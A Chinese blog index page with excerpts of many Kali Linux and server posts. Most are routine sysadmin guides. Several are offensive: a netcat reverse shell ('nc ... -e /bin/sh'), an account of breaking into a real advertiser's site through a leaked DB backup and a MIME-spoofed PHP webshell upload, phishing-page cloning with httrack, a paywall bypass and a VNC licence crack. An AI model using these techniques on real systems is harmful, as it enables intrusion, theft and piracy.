建站VPS工具综合杂谈

什么是智能摘要智能摘要可以帮助网站在搜索结果中展现更丰富，带来更多点击。您需要提供网站的结构化数据，在网站的页面中插入相应协议标签。 这里以博客的为例 <!--必填--> <meta property="og:type" content="blog"/> <meta property="og:image" content="图片地址"/> <meta property="og:release_date" content="发表时间"/> <!--选填--> <meta property="og:title" content=" 博客标题"/> <meta property="og:description" content=" 博客描述" /> <meta property="og:author" content="博客作者"/>在typecho中配置如下 <!--360--> <?php if($this->is('post')||$this->is('page')): ?> <meta property="og:type" content="blog"/> <meta property="og:image" content="<?php echo Content::returnHeaderImgSrc($this,'post',0,true); ?>"/> <met…

查看磁盘分区fdisk -l 详细解读 Disk /dev/sda：298.1 GiB，320072933376 字节，625142448 个扇区磁盘名称sda 总容量为298.1G 设备启动起点末尾扇区大小ID类型/dev/sda1*2048209919920971521G83Linux/dev/sda2 209719296625141759415422464198.1GfW95 扩展 (LBA)/dev/sda3 209920020971929520762009699G8eLinux LVM/dev/sda5 20972134441734143920762009699G7HPFS/NTFS/exFAT/dev/sda6 41734348862514175920779827299.1G7HPFS/NTFS/exFAT已使用和挂载的分区Disk /dev/mapper/cl-root：65.1 GiB，69948407808 字节，136617984 个扇区 Disk /dev/mapper/cl-swap：2 GiB，2197815296 字节，4292608 个扇区 Disk /dev/mapper/cl-home：31.8 GiB，34154217472 字节，66707456 个扇区格式化mkfs.ext4 /dev/sda5 挂载mount /dev/sda5 /www/mydata开机自动挂载vim /etc/fstab按下添加即可 UUID=/分区 挂载目录 文件系统格式 永久性 是否备份 是否自…

一次去朋友家玩，看见他家垃圾角落里有台废主机。说是要丢掉，对于我来说怎么会舍得。于是我兴高采烈的抱回了家！开始了变废为宝的脱变。先来看看外观 先给洗洗澡吧 由于手头没有专业的清洗工具，自家水龙头走起。 从新组装电脑过程很简单，怎么拆的怎么装就是了。这里就不再描述了！ 装玩即后，测试开机但是无法开机！ 检测后发现估计主机电源坏了 恰好手里面以前在垃圾站拆过一个主机电源，应该好的！ 于是便开始了移花接木！ 由于拆下来的电源比较大，这个机箱比较小。就只能凑合这样用了。 安装系统改换电源后，主机成功点亮。接下来就是安装系统了。这次我安装了Centos8 安装准备 U盘一个（32G）UltraISO(百度自行下载)centos8镜像文件 制作U盘启动打开UltraISO 文件——打开 选择你下载的Centos8的镜像文件，格式为iso 启动——写入镜像文件 U盘启动进入BIOS设置U盘为第一启动项或者在boot菜单中选择U盘即可！ 开始进入安装 选择第一个Install Centos 8 等待检测 此过程可能要等待会儿 可能会提示以下错误 在选择Install Centos 7后，几分钟后，弹出如下提示: Entering emergency mode.Exit the shell to continue. Type "journalct1" to view system logs. You might want to save "/run/initramfs/rdsosreport.txt/" to a USB stick…

在mysql中我们可以配置主从复制来备份我们的数据库。以防数据库的丢失。 环境说明主服务器： 阿里云（ *.*.*.110）从服务器： 腾讯云（ *.*.*.190）系统环境：centos7 mysql5.6在防火墙和安全组中分别开启3306端口配置主服务器登录主数据库，创建db数据库 mysql -u root -p create DATABASE db;然后编辑主数据库的my.ini文件 在[mysqld]节点中增加如下内容： #指定唯一的ID，1至32，必须的 server-id=1 #指定二进制日志存放路径，必须的 log-bin=mysql-log-bin #指定要同步的数据库，必须的 binlog-do-db=db 添加远程登录账号GRANT ALL PRIVILEGES ON *.* TO priess@'%' IDENTIFIED BY '12345678@'; flush privileges;需要注意的是一定要在安全组和防火墙中开启3306端口，否则从服务器可能无法连接。 查看主服务器的状态信息，并且找到File 和 Position 的值记录下来 show master status;记录这两个值，后面要用到。 配置从服务器在从数据库中创建新的数据库db。 然后编辑从数据库的my.ini文件 在[mysqld]节点中增加如下内容： #指定唯一的ID，2至32，必须的，并且不能跟主数据库一样 server-id=2 #指定要同步的数据库，必须的 replicate-do-db=db 设置登录主数据库的账号和密…

WPS是我们常用的一款办公工具，主要用来处理日常工作中的word excle PPT等文档。在kali中如何安装wps呢？下载wps访问wps的官网 https://linux.wps.cn/ 下载deb包 安装执行dpkg -i xxx.deb即可完成安装 双击桌面的wps图标，会有用户协议。同意即可！ 运行双击wps图标，开始你的创作吧！

如何在kali linux中测试网速呢？本文将通过使用SpeedTest来实现kali下的网速测试。 SpeedTest是我们常用来测试网络上传/下载速率的一款工具。本文将详细讲解在kali下的使用。 当然，我们也可以用在线的SpeedTest 安装脚本wget -N --no-check-certificate https://raw.github.com/sivel/speedtest-cli/master/speedtest.py 简单的测试python speedtest.py 分享你的网速python speedtest.py --share此时会生成相应的报告

利用httrack我们可以很方便的将自己喜欢的网站进行镜像复制。在通过本地的优化和修改，达到为己所用的目的。但是也有人借此来搞钓鱼网站，达到以假乱真的目的。今天通过本实例给大家演示钓鱼网站是如何运行的。 安装apt-get install httrackPS:建议使用官方源 克隆QQ邮箱登录页面 实例在终端运行httrack Enter project name 项目名称 （随意填写） Base path (return=/root/websites/) 项目存放路径 （建议放到root目录下） Enter URLs (separated by commas or blank spaces) 要克隆的网站url 剩余的默认回车就行了。 这样便完成了对目标站点的克隆

dstat 命令是一个用来替换 vmstat、iostat、netstat、nfsstat 和 ifstat 这些命令的工具，是一个全能系统信息统计工具。与 sysstat 相比，dstat 拥有一个彩色的界面，在手动观察性能状况时，数据比较显眼容易观察；而且 dstat 支持即时刷新，譬如输入 dstat 3 即每三秒收集一次，但最新的数据都会每秒刷新显示。和 sysstat 相同的是，dstat 也可以收集指定的性能资源，譬如 dstat -c 即显示 CPU 的使用情况。 安装unbnut/debian apt-get install dstatCentos yum install dstat安装效果 使用直接使用 dstat命令可以实时的监控 cpu、磁盘、网络、IO、内存等使用情况。 其他命令详解-c, --cpu ：展示cpu状态。 usr用户占比，sys系统占比，idl空闲占比，wai等待次数，这四个加和是100， hiq硬中断次数，siq软中断次数。 dsk/total 磁盘读写 read:磁盘读取速度 writ:磁盘写速度。 net/total ：网络状态 recv:接收速度 send:发送速度 paging 换页空间 展示内存到换页空间（swap）的使用情况，从内存到换页是out，从换页到内存是in，只有频繁的in和out才表明内存不足。 System int: 每秒产生的中断次数 csw: 每秒产生的上下文切换次数 上面这 2 个值越大，会看到由内核消耗的 CPU 时间会越多 使用实例CPU资源的使用情况…

我们生活中常见的都是一些比较常见的家庭的路由器。而我又喜欢动手DIY,可又苦于没有钱😂。想玩一些比较高级的东西只能望洋兴叹！！！ 准备树莓派4bOpenwrt镜像（文末附下载链接）TF卡 读卡器 写入系统利用Win32DiskImager将下载下来的openwrt镜像写入TF卡。 启动将TF卡插入树莓派。通电即可！ 登录用网线连接pc和树莓派，浏览器访问192.168.1.1看到登录页面，说明写入成功。 用户名：root 密码：password 其他的功能我就不再介绍，有需要的可以看看！ 镜像下载镜像下载

原来的公众号【kali笔记】停止运营。在此建立新的公众号【kali学习笔记】。希望通过本平台让您学到更多的网络安全知识。我们的论坛地址：https://bbskali.cn 感谢长期以来的支持与陪伴！！！（公众号搜索 “kali笔记”就可以搜到哦！）为了答谢给位小伙伴长期以来的支持，特意送上100个邀请码。先来先得哦！ 获取方法 扫码关注并在下方回复邀请码三字即可得到！ 没有注册的小伙伴 赶紧哦~ 论坛地址:bbskali.cn

KodExplorer可道云，原名芒果云，是基于Web技术的私有云在线文档管理解决方案 。Kod，读音通code，意为“代码，编码”，中文名为“可道”。 用户只需通过简单环境搭建，即可使用KodExplorer快速完成私有云/私有网盘/在线文档管理系统的部署和搭建。KOD提供了类windows用户界面，延续了windows平台的操作逻辑和使用习惯，支持100余种文件格式的在线预览，使得用户的私有云产品可以拥有本地操作一样方便、快捷、安全的体验；为企业用户提供了了文件在线存储与管理、分享和跨平台访问、群组与权限、生产流转、审批存档等全生命周期的在线文档管理的解决方案。 配置环境service apache2 start service mysql start mysql -u root -p #登录数据库 create database kod #创建数据库kod进入网站更目录cd /var/www/html 下载最新版的kodcloud wget http://static.kodcloud.com/update/download/kodbox.1.15.zip unzip kodbox.1.15.zip && chmod -Rf 777 ./*浏览器访问树莓派的IP地址进行安装。 如果缺少相应的环境，安装缺少的即可。 最后利用刚才设置的信息，登录即可。

一Tar压缩打包和解压1.1 打包解压打包命令如下（提前在根目录创建好 /backup）： tar-czvf /backup/backup$(date+%Y%m%d%H%M).tar.gz /var/www以上命令是将文件夹 /var/www下所有的文件及子文件夹打包到 /backup目录下，并以时间来命名。 解压命令如下： tar zxvf /backup/backup20200925.tar.gz -C /var/www以上命令是将压缩包解压到 /var/www目录下。 1.2 加密压缩加密压缩如下： tar zcvf - /var/www | openssl des3 -salt -k '123456' -out /backup/backup$(date +%Y%m%d%H%M).tar.gz以上命令是将文件夹 /var/www下所有的文件及子文件夹打包到 /backup目录下，设置了加密密码 123456，并以时间来命名。 加密解压如下： openssl des3 -d -k '123456' -salt -in /backup/backup20200925.tar.gz | tar zxvf - -C /var/www以上命令是将压缩包解压到 /var/www目录下，请替换你的密码。 1.3 Tar参数Tar命令其它的参数说明如下： -c ：create 建立压缩档案的参数； -C ： 创建解压后指定的存储目录； -x ： 解压缩压缩档案的参数； -z ： 是否需要用gzip压缩； -v： 压缩的过程中显示档案； -f：…

人人影视客户端，主要是一个下载视频的利器，上面的的美剧、日结、韩剧等资源都很多，而且还带搜索功能，可以直接搜索外部的资源。 下载客户端下载rrshareweb人人视频客户端文件压缩包 wget http://appdown.rrys.tv/rrshareweb_rpi.2.20.tar.gz tar -zxvf rrshareweb_rpi.2.20.tar.gz #解压 chmod -R 777 rrshareweb_rpi #修改权限运行cd rrshareweb ./rrshareweb 然后访问 http://ip:3001即可，初始密码为：123456。 填坑下载没有速度进入界面后先点击右上方设置，修改下存储路径即可。 打不开网页开放 3001端口 firewall-cmd --zone=public --add-port=3001/tcp --permanent firewall-cmd --reload最后再重启运行即可。

Goby 是一款新的网络安全测试工具，由Zwell（Pangolin、JSky、FOFA 作者）打造，它能够针对一个目标企业梳理最全的攻击面信息，同时能进行高效、实战化漏洞扫描，并快速的从一个验证入口点，切换到横向。我们希望能够输出更具生命力的工具，能够对标黑客的实际能力，帮助企业来有效地理解和应对网络攻击。 安装本文以Windows为列 首先下载 Npcap 数据捕获包，安装完成后，启动 goby即可！ 下载地址： https://nmap.org/npcap/dist/npcap-0.9983.exe 使用1.资产收集 自动探测当前网络空间存活的 IP 及解析域名到 IP，轻量且快速的分析出端口对应的协议、Mac 地址、证书、应用产品、厂商等信息。 子域名扫描 自动爬取子域名，AXFR 监测，二级域名字典爆破，关联域名查询。同时支持连接 FOFA，扩大数据源。 网站截图 通过截图，快速判断网站系统应用，无须再一一打开。 注：该功能基于 Chrome 截图插件实现，需要预安装 Chrome 浏览器。 深度分析 发现非标准端口或非标准应用系统资产，进行深入的应用识别。在实战场景中非常有效。 代理扫描 通过 socket5 代理，快速进入内网，开启内网渗透。 注：支持 Pcap 及 socket 两种模式，请根据不同的场合动态切换。 pcap 模式：支持协议识别和漏洞扫描，不支持端口扫描； socket 模式：支持端口扫描协议识别以及漏洞扫描，扫描速度慢。 插件支持msfconsole 等插件的使用 总结安装方便简单，直接双击EXE即可…

实验环境kali2020 （内网IP：192.168.123.33）Centos (百度云服务器)实验目的在 kali中获取百度云服务器的权限 PS: 需要提前开启相应额端口。 实现步骤在kali中监听 5555 端口 nc -lvp 5555在百度云服务器中执行 nc 192.168.123.33 5555 -e /bin/sh需要注意的是，因为服务器和kali不在同一网段。我在实际操作中用的是映射后的IP和端口。如果你的环境在同一网端，直接执行上面命令即可。 实验结果 其他当然，将两条命令反过来。便可以实现云服务器远程控制本地的kali。

那日，抽着我仅剩的半根华子。感叹着人生的冷暖和不易！看着日历这月马上就要结束了，工资是不是快发了呢？打工人真不容易啊~忽然手机响起了熟悉的短信铃声，难道是工资到账了。怀着激动的心情打开一个居然是某英语辅导班的招生广告，感叹自己单身十年如一日，什么时候能给孩子报辅导班呢！怀着忐忑的心情，我打开了链接…… 警告： 渗透千万条，安全第一条。请勿非法恶意攻击他人和企业，造成后果请 自重！！！ 前期的信息收集端口：21 80 3306 后台: http://xxxx.com/index.php/admin/admin 对目标进行了一波信息收集后，发现并没有常规性的 XSS sql注入 弱口令等漏洞， 峰回路转随想着放弃但是 dirb对网站目录爬取得到了一个目录 http://xxxxx.com/index.php/admin/admin/backup_db 显而易见 backup_db便是数据库的备份文件 访问该文件，成功得到数据库的备份文件。 在本地导入数据库，成功得到管理员信息。 通过对MD5的破解，成功进入后台。 爆菊登录后台后，找一个上传点。直接上传php文件。提示如下： 提示 application文件类型错误。看到这个我似乎笑了。 BURP抓包修改 application即可。 修改为 image/png格式 如上，成功上传！ 访问上传的文件！ 上传一句话 对整个站点打包下载 查找相关配置文件 如上，我们得到了数据库的配置文件 得到了数据库账号和密码 远程登录数据库 这样一次靠着运气的渗透测试就完成了。 后记本文…

前言某日某时在某群闲逛，忽有一人发来一条链接。处于手速习惯不由自主的打开了链接。界面如下： 嗯哼，感觉很是劲爆哦…… 但是提示要关注公众号才能获取验证码（我岂是那种随随便便想关注的那种人吗☺）视频中哪妖娆的舞姿，劲爆的音乐。顿时忘我想入非非，凭我多年的经验告诉我福利来了。 分析作为一名优秀的宅男，岂能禁不住这点诱惑。 向这种网站，一般和某些文库类似。你复制某些文章都会提示你关注某些公众号或者付费。 都是一个套路 对于这种，我们全局禁用 js即可，或者鼠标右键 查看源代码便有意想不到的惊喜！ 这里这段语句的含义是 function validCode(){ var code = document.getElementById('dialog_code') if(code){ if(code.value == '6666'){ sessionStorage.setItem('customer', 'kuaidoushe'); document.getElementById('full_screen').style.display = "none" } }如果 code=6666则display = none 在不关注公众号的情况下，我们直接输入 6666成功观看视频！ 你以为这就结束了no~打开 BUPR对其抓包分析！ 发现其网址格式为 www.xxx.com/video.php?_t=id 这里 id可以理解为视频的序号 随便伪造一个ID www.xxx.com/video.php?_t=60 直接跳过原来要输入验…

博客主要是以 佛系更新为主，百度收录惨淡就不提了。作为一名合格的博主，如何让百度爹地更好的收录呢？除了 sitemap 自动推送等方式外，还有那些方法呢？ 流程图 python代码import re from time import sleep import requests try: with open(r'sitemap.xml', 'r', encoding='UTF-8') as f: a = f.read() p = re.compile(r'https://(.+)</loc>') r = p.findall(a) data = '\n'.join(r) url = f'http://data.zz.baidu.com/urls?site=你的域名&token=你的token' #记得修改成自己的网址和token a = requests.post(url, data=data) print(a.text) sleep(3) except FileNotFoundError: print('请将sitemap.xml和本程序放在同一目录下') sleep(3)登录百度站长中心，获取你自己的 token 命名为 seo.py名字可以自定义。 shell脚本#!/bin/ #进入到seo优化文件 cd /root/seo #下载远程site…

什么是蜜罐蜜罐 技术本质上是一种对攻击方进行 欺骗的技术，通过布置一些作为 诱饵的主机、网络服务 或者 信息，诱使攻击方对它们实施攻击，从而可以对攻击行为进行 捕获 和 分析，了解攻击方所使用的工具与方法，推测攻击意图和动机，能够让防御方清晰地了解他们所面对的安全威胁，并通过技术和管理手段来增强实际系统的安全防护能力。 蜜罐 好比是 情报收集系统。蜜罐好像是故意让人攻击的目标，引诱黑客前来攻击。所以攻击者入侵后，你就可以知道他是如何得逞的，随时了解针对服务器发动的最新的攻击和漏洞。还可以通过窃听黑客之间的联系，收集黑客所用的种种工具，并且掌握他们的社交网络 系统介绍HFish 是一款基于 Golang 开发的跨平台多功能主动诱导型开源蜜罐框架系统，为了企业安全防护做出了精心的打造，全程记录黑客攻击手段，实现防护自主化。 多功能 不仅仅支持HTTP(S) 蜜罐，还支持SSH、SFTP、Redis、Mysql、FTP、Telnet、暗网 等扩展性 提供API 接口，使用者可以随意扩展蜜罐模块 (WEB、PC、APP )便捷性 使用Golang +SQLite 开发，使用者可以在Win +Mac +Linux 上快速部署一套蜜罐平台安装浏览器打开 https://github.com/hacklcx/HFish/releases下载相对应版本。 tar -zxvf fish-0.2-linux-amd64.tar.gz #名字是下载的压缩包，根据实际情况修改 cd hfish-0.2-linux-amd64 …

密码自古以来就是人类保护自己的一种方式。从锁?的发明到摩斯电码、直到现在的各种加密算法。密码已经成为当代人生活中不可缺少又非常重要的一种工具，更或者说是一种人们的生活方式。而破解密码也已经成为 大佬 和 小学生 共同交流的话题！ 密码破解前期的准备常见名词解释| 名词 | 释意 | | - - -| - - - | | 字典 | 即一些密码的集合，格式一般为 txt | | 暴力破解 | 一种破解方式，通过已知密码字典分别进行尝试，成功率和字典有关。 | | 掩码破解 | 由于受到字典的限制无法破解成功，可用 猜测的方式破解。如 ?a?a?a?a 代表 4位 0~9的密码（不同程序，表示方法可能不同。）但是对计算机的要求比较高 | 常见端口信息收集| 端口 | 程序 | |- - - |- - - | | 21 | FTP端口 用于上传文件到服务器 | | 22 | SSH SFTP端口，用于登录服务器执行命令 | | 3306 | mysql端口 （远程服务器需要账号授权） | | 3389 | Windwos远程登录端口 | | 5800 | VNC端口相当于Windows的远程登录 | 判断端口是否开启利用 nmap即可查看目标端口是否开启 nmap -T4 -A 192.168.1.1/24扫描局域网内所有设备开启的相关端口，当然我们也可以中 msfconsole nessus等相关神器进行信息收集，但这里不再详讲！ 如下图 这台 ASUS RT-N56U 设备开启了 22 80等端口。 常见的破解方式01压缩文件的暴力破解(…

下载首先到vnc的官网去下载最新版的vnc server 安装运行安装程序，安装vnc 破解点击 licensing 去掉下面的匿名向vnc服务器发送数据前面的 √ 点击 register oggline 运行 crack完成破解 破解成功 配置vnc账号和密码 登录测试手机端登录 linux连接window桌面

上期，写了一篇kali基础的相关文章，反响还错。不少小伙伴让我多出几篇基础教程。这不今天的教程呈上！ kali查看网卡型号、驱动版本、队列数查看网卡生产厂家和型号的基本信息 lspci查看网卡生产厂家和型号的详细信息 lspci -vvv查看网卡驱动 lspci -vvv查看网卡驱动版本 ethtool -i eth0查看网络接口队列数 cat /proc/interrupts | grep eth0 kali如何禁止用户登录1.修改用户配置文件/etc/shadow 将第二栏设置为*，如下。那么该用户就无法登录。但是使用这种方式会导致该用户的密码丢失，也就是当你再次允许他登录的时候，你还得让他重新设置密码。[再次启用这个帐号的方法是把*去掉就可以了 username:*:14245:0:99999:7:::2.使用命令usermod 这个方式简单又实用，而且没有1中的副作用。 usermod -L username ##Lock 账户名username usermod -U username ##Unlock 账户名usernamekali中配置静态IP修改下面的配置文件 /etc/network/interfaces修改如下： auto eth0 #iface eth0 inet dhcp iface eth0 inet static address 192.168.1.6 netmask 255.255.255.0 gateway 192.168.1.1参数说明： iface eth0…

随着各大厂商的云盘不断的倒闭和关门大吉，我也常常在思考自己的云盘该何去何从。从百度吧，不开会员那就不叫云盘，都快到21世纪中叶了，下载个文件十几kb。贫穷让我无法感受会员的乐趣！ 设备单树莓派500G硬盘挂载硬盘首先利用fdisk -l命令查看硬盘 挂载硬盘到指定的目录 mount /dev/sda3 /home/pan这里我将硬盘挂到了/home/pan这个目录，方便我们以后的操作。 配置虚拟主机因为apache的默认目录在var/www/html并且该目录在我们的系统盘里面，所以我们要将云盘系统搭建我们的500g磁盘里面。所以我们要配置虚拟主机。 01：修改etc/apache2.ports.conf文件 添加下面内容： Listen 8080 0：修改etc/apache2/sites-available/000-default.conf文件 添加内容如下： <VirtualHost *:8080> ServerAdmin webmaster@localhost DocumentRoot /media/root/home/pan/ </VirtualHost>将DocumentRoot的参数改为我们磁盘的w位置。 03： 重启apache service apache2 start这样我们通过http://ip:8080便可以访问我们的磁盘。 搭建云盘系统这里我用了著名的nextcloud云盘系统。 登录数据库，创建一个数据库。 service mysql start mysql -u ro…

PHP世界上最美的语言 ?，在kali中怎样安装呢？在kali2020中，源里面已经集成了 php7.3我们只需要利用 apt-get install php7.3即可完成对7.3版本的安装。那么如何安装 7.4呢？ 添加源首先在 etc/apt/下新建一个文件夹 trusted.gpg.d sudo apt -y install lsb-release apt-transport-https ca-certificates sudo wget -O /etc/apt/trusted.gpg.d/php.gpg https://packages.sury.org/php/apt.gpg写入源 echo "deb https://packages.sury.org/php/ buster main" | sudo tee /etc/apt/sources.list.d/php.list更新源sudo apt update安装php7.4到 Kali Linux.sudo apt -y install php7.4验证php -v PHP 7.4.3 (cli) (built: Feb 20 2020 14:15:45) ( NTS ) Copyright (c) The PHP Group Zend Engine v3.4.0, Copyright (c) Zend Technologies with Zend OPcache v7.4.3, Copyright (c), by Zend Technologies一个强大的PHP离…

利用nmap的插件nse功能，便可以方便的完成各种渗透测试。如sql注入的检测，密码的破解等等。 Update NSE Databasenmap --script-updatedbXSS检测Nmap -sV --script=http-unsafe-output-escaping <target>SQL Injectionnmap -sV --script=http-sql-injection <target>